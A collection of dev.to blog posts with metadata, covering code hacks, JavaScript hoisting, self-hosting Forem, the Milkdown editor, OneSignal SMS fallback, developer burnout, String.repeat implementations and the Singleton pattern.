So, let's consider several reasons why we maybe shouldn't be surprised by hacks as viable, successful solutions.
## Excitement
Hacks can be exciting! Nobody wants a protagonist who has all the time and resources they need at their disposal. That's not good storytelling. Just ask MacGyver here.
{% youtube EKyCh_WuV6M %}
Now, I'm only half-joking. You could find yourself working for a company, or on a particular project, where you don't have all of the resources or support you'll need to be effective.
This will force you to get creative and think outside the box. And after a few such challenges in your career, you'll be a better developer because of it.
## Pragmatism
When it comes to prototypes, A/B tests, and confirming hypotheses about your product the best way to effectively deliver is actually by writing the fastest, shittiest code you can.
And sometimes you just have to _ship it_, even for production code. There's often a deadline, at which point nobody really cares that you're a code poet. A hack could be the path of least resistance.
A certain amount of technical or product debt isn't, in and of itself, a bad thing. It's an _artifact_ of a decision that was made to get to an end result. It's evidence of a compromise that was made, or a trade-off that (I hope!) was carefully weighed.
How you track that debt and pay it down is another question, of course...
## Critical Thinking
Speaking of trade-offs, hacks are an opportunity for critical thinking. A responsible hack means you've considered things like cost versus benefit or risk versus reward. This is actually a very important learned skill over time.
At the very least, in the short-term a hack might shake loose the ideal solution to a problem you've been struggling with all day. You'll think about it when you go home that evening and maybe even lose some sleep over it. But, in mulling over the hack you'd really prefer to avoid in the morning, you just might come back with a better solution!
## YAGNI
You also need to consider the likelihood that You Aren't Gonna Need It (a.k.a. [YAGNI](https://martinfowler.com/bliki/Yagni.html)). A simpler solution is almost always the better solution, if you can pull it off. Sometimes that might feel like a hack.
I can't be sure, but I think Ron Jeffries might be [against premature implementation](https://ronjeffries.com/xprog/articles/practices/pracnotneed/):
> Resist that impulse, every time. Always implement things when you actually need them, never when you just foresee that you need them.

Trying to predict the future of your code is ambitious. The odds are low that you'll end up being correct. So, it might be more prudent to hedge your bets with a conservative stop-gap measure that costs you less up front.
## Impermanence
In a similar vein, very little of your hard work will live forever. Software can have a very short shelf life whether it's due to redesigns, refactors, business closures or acquisitions, startup pivots, and so on.
I once did some quick math on a napkin and surveyed my previous 9 jobs going all the way back to the late 90s. It's probable that only about 20% of anything I'd ever worked on still existed. Obviously, output from my very first job is gone—so long, [Coldfusion](https://en.wikipedia.org/wiki/Adobe_ColdFusion)!—but so is stuff I worked on just a few years before.
The point being, if perhaps there's a hack in production that you're _really_ not proud of you might not have to worry for very long!
## Durability
On the other hand, your hack could last a lifetime.
If that hacky code is working and delivering value then [you've created legacy code](https://matthogg.fyi/legacy-code-may-be-the-friend-we-havent-met-yet/). Congratulations!
But if that hack doesn't work perfectly, well, I still wouldn't worry much. We can all think of that bug, maintenance task, or tech debt issue that sits in a Jira backlog for months or even years, right? A codebase will always have issues that ultimately never get looked at, which raises the question: _if you never fix it, was it ever broken?_
{% twitter 501718937420455937 %}
For instance, I can tell you that one of Canada's most popular websites contains a self-identified hack that's been executed by hundreds of thousands of visitors daily for at least 7 years and counting.
For fun, I recommend searching for terms like `hack` or `FIXME` hidden in the comments of your codebases and see what you find.
## It's Not Just Software
Speaking of durable hacks, we can broaden the original definition beyond just software. We're surrounded by _many_ hacks which we take for granted every day.
Advances in science and engineering often progress by way of hacks. The Apollo moon landings are a great example—to get to the moon we literally _threw away an entire Saturn V rocket every time_. Oh, and if you expected to come home you had to crash a tiny module into the ocean and be rescued. And yet, there are footprints on the moon!
And let's not forget what a central processing unit (CPU) truly is:
{% twitter 841802094361235456 %}
The scientific theory of evolution by natural selection is the ultimate hack. Evolution does not prematurely optimize! Natural selection works with whatever's at hand and the smallest change that works well enough is the winner. You, reading this right now, are the result of an innumerable series of tiny hacks.
That said, the human body is still a hot mess:
- Our eyes are wired backwards.
- Our spines were never meant to be vertical.
- We put food and air down the same hole.
And then there's childbirth. The pelvis and birth canal are narrow because we grew to enjoy walking on 2 feet. However, our brains are also big and, like, really smart. So, babies come out when they do because their heads wouldn't fit if they waited any longer! Babies also have soft skulls to facilitate this, and can only come out head-first and facing backwards. Consequently, newborns still develop as if they're in the womb—the so-called 4th trimester.
## OK, OK, But The Software!
Sorry! That was a bit of a tangent.
If you employ a hack, don't be so ashamed. Don't be too proud, either. Above all, don't be lazy—be certain and deliberate about _why_ you're using a hack. Remember there are times you shouldn't use a hack (i.e., extending or tacking onto an existing hack).
If you discover a hack, try to reserve judgement. Consider why it might be there... Is the developer going for a moon shot? Do they think they're MacGyver? Is YAGNI a consideration? Use the hack as an opportunity for dialogue and empathic code review.
So, I guess I'm ultimately pleading for ambivalence and nuance—hacks can be evil, lazy, clever, useful, or anything in between. Hacks are just... fine. But since hacks are all around us, and constantly so, it's to our benefit to accept their utility and consider them an essential skill in any developer's bag of tricks. Maybe.
<small>Images, in order of appearance, are courtesy of [xkcd](https://xkcd.com/974/).</small> | mrmatthogg |
753,528 | Game Development Course Announcement - Become a Game Developer Without a Degree | Farhan Aqeel | https://www.youtube.com/watch?v=4_92hSf0dJY&list=PLBh8phtAyHPUY9fqgs1w6aHJALJ3_fMSc How to... | 0 | 2021-07-08T10:18:37 | https://dev.to/geeksread/game-development-course-announcement-become-a-game-developer-without-a-degree-farhan-aqeel-2jl2 | gamedev, unity3d, csharp | https://www.youtube.com/watch?v=4_92hSf0dJY&list=PLBh8phtAyHPUY9fqgs1w6aHJALJ3_fMSc
How to become a game developer without a degree? In this video, I have some things to say about my upcoming series that will help you become a game developer without a degree. In this game development course, I will start from the very basics and move on to intermediate topics that will help you become a game developer who can earn money through freelancing websites such as Upwork, Fiverr, Freelancer, and other freelancing platforms. Freelance game development has a wide scope on freelancing marketplaces: you will be able to get game development projects on websites such as Fiverr, Upwork, and Freelancer. In this course, we will look at C# (the programming language used in Unity3D game development). This will be the first free game development course in Pakistan on the level of any top-class game development course offered online.
My plans?
After getting many queries about freelancing, I have started a web series in which I'll teach what to work on online and how. If you think that this series may provide benefit, then don't forget to share it in your circle.
Youtube: https://www.youtube.com/farhanaqeel
Facebook group: https://www.facebook.com/groups/Freel...
Facebook:https://www.facebook.com/FreelanceTea...
Instagram: https://www.instagram.com/farhan.aqeel
Website: https://www.geeksread.com/ | geeksread |
753,533 | Understand Hoisting in JavaScript once and for all | What is Hoisting? Hoisting is a JavaScript behavior in which a function or variable can be... | 0 | 2021-07-08T11:10:29 | https://dev.to/amarjits/understand-hoisting-in-javascript-once-and-for-all-31o6 | javascript, webdev, tutorial, codenewbie | #What is Hoisting?
Hoisting is a JavaScript behavior in which a function or variable can be used before declaring it. JavaScript moves the function and variable declarations to the top of their scope just before executing it, Due to which we can access them even before its declarations.
Let's understand it by going through some examples.
## Variable Declarations:
### When using the `var` keyword:
Below is an example where we have declared a `counter` variable and set its value to 1. However, we are trying to `console.log` it before its declaration.
``` javascript
console.log(counter); // undefined
var counter = 1;
```
On executing we get the counter value as `undefined`. This is because JavaScript only hoists `declarations`.
JavaScript hoists the declaration of counter and initializes its value as `undefined`. Therefore, the code looks something like this in the execution phase.
```javascript
var counter;
console.log(counter); // undefined
counter = 1;
```
### When using the `let` or `const` keyword:
When using the `let` or `const` keywords, JavaScript hoists the declarations to the top but they will not be `initialized`.
```javascript
console.log(counter);
let counter = 1;
```
Therefore, when we try to `console.log` the `counter` before initializing it, we will get a `ReferenceError`:
```
ReferenceError: Cannot access 'counter' before initialization
```
The same thing happens with the `const` keyword.
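A short runnable sketch (in Node, with made-up variable names) contrasting the two behaviors:

```javascript
// `var` declarations are hoisted AND initialized to undefined,
// so reading the variable early yields undefined instead of throwing:
console.log(typeof count); // "undefined"
var count = 1;

// `let`/`const` declarations are hoisted but left uninitialized
// (the "temporal dead zone"), so reading them early throws:
try {
  console.log(total);
} catch (err) {
  console.log(err.name); // "ReferenceError"
}
let total = 2;
```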
## Function Declarations:
Like Variables, JavaScript also hoists function declarations. It means that it moves the function declarations to the top of the script.
```javascript
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
function add(a, b){
return a + b;
}
```
Now the above example won't result in an error even though we are calling the `add()` function before defining it.
The code looks something like this during execution:
```javascript
function add(a, b){
return a + b;
}
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
```
### When using an Arrow Function or Anonymous Function:
In the below example we change `add` from a regular function to an anonymous function.
```javascript
let x = 5, y = 10;
let result = add(x, y); // TypeError thrown here
console.log(result);
var add = function (a, b) {
  return a + b;
};
```
Now, when JavaScript hoists the declaration of the `add` variable, it initializes it as `undefined`. Therefore, we get an error like this:
```
TypeError: add is not a function
```
Now, you might be wondering what will happen if we use `let` instead of `var`.
```javascript
let x = 5, y = 10;
let result = add(x, y); // ReferenceError thrown here
console.log(result);
let add = function (a, b) {
  return a + b;
};
```
We will get an error again, but this time the error message will be different, as JavaScript will hoist the declaration of `add` but it will not be initialized.
```
Uncaught ReferenceError: Cannot access 'add' before initialization
```
The same thing will happen if we use an Arrow Function because Arrow functions are nothing but syntactic sugar for defining function expressions.
### Some Tips to Avoid Hoisting Pitfalls:
* Declaring your variables at the top is always a good rule.
* You can also use Strict Mode.
* In the case of variables, it is better to use `let` than `var`.
Hoisting in JavaScript is an important concept to understand as it might lead to bugs and unexpected behavior in your code.
That's it, I hope you learnt a lot from this blog. If you enjoyed this post, I’d be very grateful if you’d share it. Comment below if you have any doubts or questions.
Thank you for Reading!🙂
| amarjits |
753,599 | Self hosting Forem(Dev) on your VPS; using t2d! | Now you can have your own [dev.to like] community. In this installation process, I use t2d(Talk to... | 8,399 | 2021-07-08T12:23:16 | https://app.leewardslope.com/morty/self-hosting-forem-on-your-vps-1d21 | selfhosting, t2d, webdev, tutorial | Now you can have your own [dev.to like] community. In this installation process, I use t2d(Talk to Dokku) a bash script which is powered by whiptail and dokku.
### Forem
Forem is open source software for building communities. It is the open source software that powers DEV and other inclusive communities; including [my own community](https://app.leewardslope.com)
Other Communities which are using Forem: https://www.forem.com/discover/
### t2d
t2d, aka Talk to Dokku, is a Terminal User Interface (TUI) powered by dokku and whiptail. With t2d you will be able to deploy apps in the most popular programming languages and link them to the most popular databases, all with almost zero configuration on your side. Apart from all these amazing features, it will also save you money along the way.
For more info [Click Here](https://github.com/akhil-naidu/t2d)
## Demonstrating Forem Installation using t2d
{% youtube m4jm2ZOA9bg %}
## Screen Shots of t2d v2.1






Press "Enter", to automate the Dokku installation. More information can be seen in the video above.
---
Once the installation is done, you may sometimes need to update your ENV variables or update your entire Forem instance with the latest changes.
You can also use t2d for post-deploy configuration. Right now, I have added only a few essential options. This section of t2d will be updated daily.



## Repository
{% github akhil-naidu/t2d %}
| akhilnaidu |
754,008 | Introducing Milkdown: A plugin driven WYSIWYG markdown editor | Overview Milkdown is a lightweight but powerful WYSIWYG markdown editor. It's made up by... | 0 | 2021-07-08T18:46:29 | https://dev.to/saulmirone/introducing-milkdown-a-plugin-driven-wysiwyg-markdown-editor-17n7 | showdev, javascript, typescript, markdown | ## Overview
Milkdown is a lightweight but powerful WYSIWYG markdown editor. It's made up of two parts:
- A tiny core which provides a markdown parser, a serializer, and various kinds of plugin loaders.
- Lots of plugins that provide syntax, commands and components.
With this pattern you can enable or disable any custom syntax you like, such as table, latex and slash commands.
You can even create your own plugin to support your awesome idea.
---
## Links
- [online editor](https://saul-mirone.github.io/milkdown/#/online-demo)
- [documentation](https://saul-mirone.github.io/milkdown/)
- [github](https://github.com/Saul-Mirone/milkdown)
## Features
- 📝 **WYSIWYG Markdown** - Write markdown in an elegant way
- 🎨 **Themable** - Theme can be shared and used with npm packages
- 🎮 **Hackable** - Support your awesome idea by plugin
- 🦾 **Reliable** - Built on top of [prosemirror](https://prosemirror.net/) and [remark](https://github.com/remarkjs/remark)
- ⚡️ **Slash & Tooltip** - Write fast for everyone, driven by plugin
- 🧮 **Math** - LaTeX math equations support, driven by plugin
- 📊 **Table** - Table support with fluent ui, driven by plugin
## Tech Stack
Milkdown is built on top of these tools:
- [Prosemirror](https://prosemirror.net/) and its community - A toolkit for building rich-text editors on the web
- [Remark](https://github.com/remarkjs/remark) and its community - Markdown parser done right
- [Postcss](https://postcss.org/) - Powerful css tool to build themes
- [TypeScript](https://www.typescriptlang.org/) - Developed by typescript
- [Prism](https://prismjs.com/) - Code snippets support
- [Katex](https://katex.org/) - LaTex math rendering
---
## First editor
We have some pieces for you to create a very minimal editor:
> **We use [material icon](https://fonts.google.com/icons) and [Roboto Font](https://fonts.google.com/specimen/Roboto) in our theme**.
> Make sure to include them for having the best experience.
```typescript
import { Editor } from '@milkdown/core';
import { commonmark } from '@milkdown/preset-commonmark';
// import theme
import '@milkdown/theme-nord/lib/theme.css';
const root = document.body;
new Editor({ root }).use(commonmark).create();
```
---
For further information, please visit our [website](https://saul-mirone.github.io/milkdown/). | saulmirone |
754,058 | Using SMS as a Fallback Option for Push Notifications | Using SMS as a fallback communication channel for users who are not subscribed to push... | 0 | 2021-07-12T18:53:54 | https://onesignal.com/blog/using-sms-as-a-fallback-option-for-unsubscribed-push-users/ | javascript, react, nextjs, webdev | ---
title: Using SMS as a Fallback Option for Push Notifications
published: true
date: 2021-07-08 18:24:07 UTC
tags: javascript, react, nextjs, webdev
canonical_url: https://onesignal.com/blog/using-sms-as-a-fallback-option-for-unsubscribed-push-users/
---

Using SMS as a fallback communication channel for users who are not subscribed to push notifications can help you reach a larger portion of your audience while respecting their communication preferences.
For example, a coffee company may use mobile push notifications to let customers know when their order is ready for pickup. To deliver a seamless customer experience for all patrons, they could set up SMS as a fallback communication channel in the event that a customer is not subscribed to push notifications. Doing so will ensure that more customers receive order pickup alerts and also creates a more inclusive and customer-centric brand experience.
This 5-step guide will demonstrate how to compose OneSignal Web Push SDK with the OneSignal Rest API to enable SMS for users who are not subscribed to push notifications on your site. This example is based on the [OneSignal + Next.js integration sample app](https://github.com/OneSignalDevelopers/OneSignal-Nextjs-Sample). All of the components needed to implement this use case can be implemented using any web technology and are not limited to Next.js and React.
This guide assumes that you have already configured the [OneSignal Twilio integration](https://documentation.onesignal.com/docs/sms-quickstart).
## 1. Check if the current user has subscribed to push notifications
The OneSignal Web Push SDK provides an asynchronous function, [isPushNotificationsEnabled](https://documentation.onesignal.com/docs/web-push-sdk#ispushnotificationsenabled), that returns a boolean value describing whether the current user has push notifications enabled. You'll call this function on the client once the component mounts to the DOM.

## 2. Tag users who have push notifications disabled
If the user does not have notifications turned on, you'll need to [tag the user](https://documentation.onesignal.com/docs/web-push-sdk#sendtag) with some metadata to target them via our [Segments](https://documentation.onesignal.com/docs/segmentation) feature.
You can tag users by calling the `sendTag` function made available by our Web Push SDK. The tag name is arbitrary, so I’m using `subscribed_to_push` as the tag for this example. You can filter users based on these tag values — something you’ll take advantage of when creating a new audience segment.

To enable an SMS notification as a fallback to push notifications, apply the `subscribed_to_push` tag based on whether or not the user has push notifications enabled.

## 3. Create an API endpoint that creates an SMS
To control when a notification is sent to the user, you'll need to create an API route to request the OneSignal API to send a notification on demand. You can achieve this with the notifications endpoint on the OneSignal API.
To send a text message notification, construct a request with the following shape.
```
{
  "include_phone_numbers": ["+18001234567"],
  "name": "Identifier for SMS",
  "sms_from": "Twilio phone number",
  "contents": {
    "en": "English message",
    "cn": "Chinese message"
  }
}
```
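As an illustration, here is a small helper (hypothetical, not part of any OneSignal SDK; the app ID, phone numbers, and sender number are placeholders) that builds this request body, including the `app_id` field the REST API also expects:

```javascript
// Hypothetical helper that builds the SMS notification payload
// described above. All concrete values are placeholders.
function buildSmsNotification({ appId, phoneNumbers, smsFrom, contents }) {
  return {
    app_id: appId, // required by the OneSignal REST API
    include_phone_numbers: phoneNumbers,
    name: "Push-fallback SMS",
    sms_from: smsFrom,
    contents,
  };
}

const payload = buildSmsNotification({
  appId: "YOUR_APP_ID",
  phoneNumbers: ["+18001234567"],
  smsFrom: "+15550001234",
  contents: { en: "Your order is ready for pickup!" },
});

console.log(JSON.stringify(payload));
```

The resulting object would then be POSTed to the OneSignal notifications endpoint (`https://onesignal.com/api/v1/notifications`) with your REST API key in the `Authorization` header.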
Because I’m using Next.js for this example, I need to add a file to `pages/api` that exports a function that accepts an HTTP request and response object. In this example, I will set up the route to pull the phone number from the request body, but you can look up your users’ phone numbers instead.

## 4. Call the API endpoint that creates an SMS
The final step to enable automatic fallback to SMS notifications is to post a request to the route responsible for creating the notification. I will make this request in the callback passed to `isPushNotificationsEnabled` only when the user does not have push notifications enabled.

A text message will now be sent to the numbers in the request body whenever a user navigates to a page using the OneSignal hook. The phone number is currently hard-coded for demo purposes; you may need to get the number from the app state or perform a server-side lookup for the user’s account information if your site requires that user’s login.
## 5. Push an SMS to the segment of users who are not subscribed to push notifications
To support sending SMS notifications to all users who have opted out of push notifications, you can create a segment in your OneSignal Dashboard and filter by the tag’s value: `subscribed_to_push`.
The first step to send messages to all users with push notifications disabled is to create a new segment. I’m naming the segment _Opted-out of push notifications_ and filtering by `subscribed_to_push` is `false` and the device type is SMS.

Sending an SMS notification to all users in the segment requires creating a message to send and selecting this new segment as the target.


When you click send, the text message will be sent to everyone in the segment, completing the workflow.
## Other Updates on the Horizon
We are in the process of developing a new push-to-SMS retargeting functionality that will enhance our SMS fallback delivery capabilities. If you're interested in trialing this feature and providing feedback to inform our product roadmap, click the link below to learn more about participating in our Beta Program.
### >> [Learn More About the OneSignal Beta Program](https://onesignal.com/beta-program)
### Additional Support
Have questions or need some support getting started? We're here to help. Reach out to us at **support@onesignal.com** or [login to your OneSignal account](https://app.onesignal.com/login) and send us a message from your dashboard. | iamwillshepherd |
754,345 | Tips To Avoid Developer Burnout Like a Pro | Are you properly handling the stress in your dev life right now? Being stressed out because you have... | 0 | 2021-07-09T05:21:42 | https://dev.to/krowser/tips-to-avoid-developer-burnout-like-a-pro-1n69 | career, productivity, codenewbie | Are you properly handling the stress in your dev life right now?
Being stressed out because you have pending code to write, or being unable to stare at your IDE for longer than 10 minutes without tabbing out and browsing the Web: both are symptoms of developer burnout. In other words, you've spent so much of your energy coding that you no longer can stand it.
This happens to all of us senior and junior devs alike. It’s the problem of having a job that sometimes is also a hobby. When that happens, you love coding so much that you spend nine hours working on it and then a few extra working on your personal projects.
Don’t worry though — at least not too much — because there are ways to avoid burnout. You just have to understand what you’re going through first.

#What Causes Developer Burnout?
For you to understand how to avoid it, you first need to understand where it comes from. Burnout comes from spending too much energy on a single activity, which in turn affects every other aspect of your life. It’s that simple.
That can be seen in many ways, for instance, making coding the only activity you do your entire day. When you spend 12 to 18 hours a day coding, what else do you have time for? Other than eating and sleeping, I mean?
Or, perhaps only focusing on coding, even when you’re not writing code. Reading about coding, coding techniques, new frameworks, other languages. While you’re not actively writing code when doing any of these things, you’re still only focusing on a single task. Your mind is unable to break from the coding state of mind. Even if you’re not consciously thinking about them, your coding blockers (pending tasks on your daily job, future features you’re trying to implement on your pet project, new frameworks you’ve been dying to learn but haven’t had the time for) are adding to your stress and anxiety.
You can tell yourself you’re doing it for a reason but no matter how noble that reason might be, you’ll end up burning out. Even if your mind resists it, your body will yield. You’ll start seeing physical problems such as losing (or graying) hair, stomach issues, upper back or neck pains due to strained muscles. These are all symptoms burned out developers feel. I know because I’ve felt them myself.
# What Can You Do To Avoid Burnout Then?
Stop coding. That’s the first step.
Not entirely of course, but give yourself a fixed time window in which you’re allowed to code. Then stop.
And by “stop” I mean it. Close your IDE, stop Googling for a solution, and stop making notes for tomorrow. It’s “you” time now.
I don’t care if you love coding. You are not a code-writing machine, you’re a person, and we humans need more than one thing in our lives. You need interaction with other people or activities that will keep your mind off of coding.

What can you do? Here are a few ideas:
# Play a game
If you’re not a social person, playing games can also help. But please don’t play a game you developed yourself; otherwise you’ll just get distracted by any bugs you notice in the gameplay.
Find one that speaks to you and captures your attention, then dive right into it. Mind you, don’t change one burnout for the other, but try to balance your gaming time within your day. Maybe spend one or two hours after work as a way to help your mind make the context switch into not thinking about code anymore.
And if you are a social person, you can still implement gaming with friends (especially now that we’re all isolated) through online gaming. Use voice chat to pretend you’re all sitting together; that also adds a lot to the experience and allows you to have an actual conversation about other people’s interests. It’ll force you to stop thinking about your code and think about something completely different.
# Read a book / Watch a movie
While they’re not the same type of activity, they both contribute in the same way: they take you out of your world and put you into a different one. If you’re more into “not thinking and letting others do the work for you,” then a movie is a great escape (I personally love watching movies to forget about work problems).
If, on the other hand, you have the time to read a book, then it’ll have the same effect. It’ll take you out of your house and into a completely different world where your problems (and your context) don’t exist. You’ll spend a few hours completely unaware of whatever is causing the burnout. You’ll feel refreshed and re-invigorated once you’ve closed that book for the day.
# Catch up with friends or family
If you can, leave your house. But if you can’t, a video call or even a phone call will do. Talk to other people and actively listen to them. Making a call “because you have to” and then going back to coding will not have any positive effect. Instead, spend some time having a conversation about life, about problems, or about anything that is not work-related. Something as simple as that will help you get your mind off whatever is causing your burnout.
# Take a break
Funny story, I didn’t know how to finish this article, and I had been writing since 4 a.m., so I left for a walk right at this point. It was a beautiful day, so my wife and I went for a walk. We picked up my kids from school, spent some time with them, and in the end, it was too late for me to go back to writing. It’s the next day now, my mind is fresher, and I know how to move forward. I could’ve stressed out about the fact that I couldn’t finish this story yesterday, but instead, I gave myself time. That’s the whole point of taking a break.

# Get off of social media
Look, I get it, I love using Twitter, Clubhouse & LinkedIn, and I’m sure you have your favorite social media platform, but you need to stop using them from time to time. Some people even recommend uninstalling these apps from your mobile devices, so you can remove the notifications-related anxiety from your life. This is great if you notice that your social media activity is 100% related to your burnout. If you’re getting burned out because you have an open source project that’s getting lots of activity online, then your phone is probably buzzing with updates. Stop it. You can’t unplug if you’re constantly reminded about it.

# Remove work-related notifications from your mobile devices
In the same vein as the social media app removal, if it’s work that’s causing your burnout, unplug from it. That means turning off email and slack (or whatever combination you might have) notifications, or even if you have a dedicated work phone, turn it off if you can. If you’re not meant to be working, you should not be looking at work-related notifications. That’s the rule you need to live by.

# It Can Wait
That’s the mantra you need to keep in the back of your mind. That problem you’ve been trying to solve for the past five days? It can wait a few more hours. Take a break. That new release of your framework? It can wait a little longer. Spend some time with your family. That email you started writing three times but got interrupted? It can wait; it’s “you” time. Go read a book.
Once you accept the fact that everything but your health can wait, then taking a break becomes slightly easier.
What are you doing to lower or avoid your own burnout? How are you handling stress during the pandemic? Share your experience with others in the comments.

| krowser |
754,382 | Implementing String repeat() function in JS | As per MDN, The repeat() method constructs and returns a new string which contains the specified... | 13,507 | 2021-07-09T06:00:08 | https://blog.lakbychance.com/implementing-string-repeat-function-in-js | javascript, algorithms, computerscience | As per [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/repeat),
> The `repeat()` method constructs and returns a new string which contains the specified number of copies of the string on which it was called, concatenated together.
Now one might think that there is a really straightforward way to implement this. Yes there is, but if you're asked this in an interview and go with the straightforward way, they will be like :-

How do I know this ?
Because I got **mehhhhd......**
So that's why we are going to see a few approaches to solve it. The real optimized approach was not intuitive to me and is still something I am trying to wrap my head around. But I came up with a middle-ground approach that works better than the **meh!!** one.
And once, again we will take a synonym for `repeat`.
**Google time** !!!!

`replicate` sounds cool.

Alright let's go implement `String.prototype.replicate` now :-
### The Meh Approach
```js
String.prototype.replicate = function(count) {
let input = this;
let result = "";
for (let index = 0; index < count; index++) {
result += input;
}
return result;
}
```
**Meh explanation :-**
We initialize `result` to `""` and start a `for` loop in which we iterate till `count` and simply keep appending the `input` to the `result` variable. Very straightforward but **meh!!**.
**Meh benchmark :-**

100% slower with 108 operations per second compared to 9202566.4 operations per second. Let me cry in the corner.

### The Little Less Meh Approach
```js
String.prototype.replicate = function(count) {
let input = this;
let result = this.valueOf();
for (var index = 2; index < count; index*=2) {
result += result;
}
let remainingCount = count - index/2;
return remainingCount > 0 ? result + input.replicate(remainingCount) : result;
}
```
**Little Less Meh explanation :-**
* Let's consider the case of `'hey'.replicate(10)` :-
* We have `input` initialized to `this` and `result` initialized to `this.valueOf()`. The `valueOf()` bit helps avoid the implicit conversion that would otherwise happen every time `result` is later concatenated to itself.
* Now the `for` loop stuff -
* `index` is intialized to `2`.
* `index` should be less than `count`
* `index` should be multiplied each time by `2`
* `result` will be appended to itself each time in the iteration:-
* `result` for `index = 2` will become `heyhey`
* `result` for `index = 4` will become `heyheyheyhey`
* `result` for `index = 8` will become `heyheyheyheyheyheyheyhey`
* `index` will become `16` which is greater than `10` and we exit the loop.
* `remainingCount` will be `10` - `16/2` = `2`;
* When `remainingCount` will be greater than `0`, we will recurse by calling `input.replicate(remainingCount)` and add its result to current `result` or simply return `result`.
**Little Less Meh benchmark :-**

76.79% slower with 2109699.5 operations per second compared to 9091332.85 operations per second. That's still relatively slower than the native one but way way way faster than what we had initially.

Earlier, performing the repetitions itself was **O(count)**, but now the cost is somewhere along the lines of **O(log(x) + log(y) + .... + log(k))**, though not quite **O(log(count))**.
In `'hey'.replicate(10)` scenario :-
* First time, **O(log(8))** work is done and then in the next recursive step **O(log(2))**, i.e. `O(log(8) + log(2))`. And if I am doing the maths correctly,
`log(a) + log(b) = log(ab)`
That means `O(log(8) + log(2))` is `O(log(16))` which is greater than `O(log(10))`(the optimal solution).
### The legendary optimal [solution](https://stackoverflow.com/a/5450113/8130690) I would have never landed upon without the internet
```js
String.prototype.replicate = function(count) {
let result = ''
let pattern = this.valueOf();
while (count > 0) {
if (count & 1)
result += pattern;
count >>= 1
if (count) pattern += pattern;
}
return result;
};
```
**Noob explanation :-**
I am still trying to understand the intuition behind this solution, but I think it has to do with the fact that every number can be represented in binary form. So let's say `count` is **5**; then it can be represented as `101` in binary. That makes it possible for us to repeat the string `count` times by just resorting to **binary calculations**. If we try to differentiate between **4** and **5**, we know there is an extra **1** in the latter case.

Now instead of seeing the above code as some **binary work of art**, replace **count&1** by **count%2!==0** and **count>>=1** by **count=Math.floor(count/2)**. What this means is that, whenever `count` is odd, we want to save the `pattern` built up so far in the `result` variable.

What is `pattern` ? `pattern` is a repeated concatenation of itself, similar to our earlier algorithm, so it always grows in powers of 2. It's necessary to take care of the situation when `count` is **not divisible by 2** and store the current `pattern` in `result` as we go, until `count` becomes 0.
Did you expect a better explanation ? I can't give it right now since I am a **noob** in binary land. But maybe somewhere in a parallel universe I invented this Algo and helped Brendan Eich get rid of `typeof null` -> `object` 🤷♂️.
**Best benchmark yet :-**

Still 29% slower ? WTH. But hey, I ain't competing with JavaScript engines here.
### The Bonus MDN [polyfill](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/repeat)
```js
String.prototype.replicate = function(count) {
var str = '' + this;
count = +count;
count = Math.floor(count);
if (str.length == 0 || count == 0)
return '';
var maxCount = str.length * count;
count = Math.floor(Math.log(count) / Math.log(2));
while (count) {
str += str;
count--;
}
str += str.substring(0, maxCount - str.length);
return str;
}
```
Expected an explanation ? I don't care and you will see why 👇
**The mandatory benchmark :-**

99.94% slower with 5211.6 operations per second compared to 8344361.29 operations per second. And there is a definite reason why it is even slower than what I came up with. What I think is happening is that up to a **power of 2** which is less than `count`, it uses the same ideology as the optimal solution, concatenating and doubling the length of `str` every time. But after that, for the remaining length, it uses `substring` and appends the result to `str` again. It's this second `substring` step that makes it a costly operation. Though it does better than the initial **Meh** solution of **108** ops/s, it's still nowhere near the best optimal solution I found online, or even mine 😎.
**MDN : 0**
**Lakshya : 1**
JK. The site is and hopefully remains a gold mine ❤️.
Here are the overall benchmarks :-

Have something to add on ? Feel free to

### Thank you for your time :D | lakbychance |
754,449 | Design Patterns: Singleton | This week on design patterns, we have the Singleton. It's the last creational design pattern that... | 12,869 | 2021-07-29T07:13:56 | https://dev.to/tamerlang/design-patterns-singleton-36di | computerscience, beginners, programming, architecture | This week on design patterns, we have the Singleton.
It's the last creational design pattern that we will cover.
Today you will learn:
- Understand the core concepts of the Singleton pattern.
- Understand why the Singleton pattern is considered an anti-pattern.
- Recognize opportunities to use the Singleton pattern.
- Understand the pros and cons of the Singleton pattern.
## Definition

> In software engineering, the singleton pattern is a software design pattern that restricts the instantiation of a class to one "single" instance. — Wikipedia
In a nutshell, the Singleton Pattern:
- **Ensures that a class only has a single instance**
But why would we want to have only a single instance of a class?
There might be many different use-cases, but the most common would be the ability to access some shared resource - a database or file.
In essence, if you created an object and then wanted to create a new one, you would not get a fresh object; instead, you would get the old one you created.
Keep in mind that this behaviour is almost impossible to implement in the regular constructor since it must **always** return a new object.
- **Provide global access to that instance**
Basically, we would want our instance to be accessible anywhere in the code base, that's why we make that instance globally accessible. This also protects our instance from being overwritten by other objects.
However, this may be very unsafe, due to the instance being global.
This is one of the reasons why critics consider the Singleton Pattern an Antipattern.
### What is an Antipattern?

At the beginning of the series we have defined the design pattern, they are basically a common solution to a recurring problem.
On the other hand, an Antipattern is a common solution to a recurring problem **THAT** has negative consequences in the long run.
Antipatterns aren't specifically software related, they can be managerial problems or even architectural problems.
In our case, the Singleton pattern is considered to be an Antipattern due to the fact:
- Tightly couples your code to a Singleton.
- Introduces lots of complexity if your application is multi-threaded.
- They are hard to test because they are global.
**BUT** in the right environment and implementation, Singletons can be a good option.
## Implementation
There are different ways to implement a Singleton, but they all share these two steps:
- Make your constructor private to prevent other objects from creating new instances of the Singleton class.
- Create a public static creation method to return a new or recurring instance. Under the hood, it checks whether the class already has an instance or not, and acts appropriately.
Here's a naive example using JavaScript:
```js
class Singleton {
  static instance = null;

  // JavaScript has no truly private constructors,
  // so we guard against direct `new` calls manually.
  constructor() {
    if (Singleton.instance) {
      throw new Error("Use Singleton.getInstance() instead of new Singleton().");
    }
  }

  static getInstance() {
    if (!Singleton.instance) {
      Singleton.instance = new Singleton();
    }
    return Singleton.instance;
  }
}
```
## When to use this pattern?
**Use the Singleton pattern when you only want a single instance of a class**, this may be a database or some logger object that would be shared across your program.
The Singleton Pattern disables all other means of creating another instance of a class, which guarantees that the instance is either a newly created one or an existing one.
## Pros
- You can be sure that a class only has a single instance.
- You have global access to that single instance.
- The Singleton object is only initialized when it's requested the first time.
## Cons
- Violates the Single Responsibility Principle. The pattern solves two problems at the same time.
- Your code gets coupled to the Singleton.
- Gets very complex in multi-threaded applications.
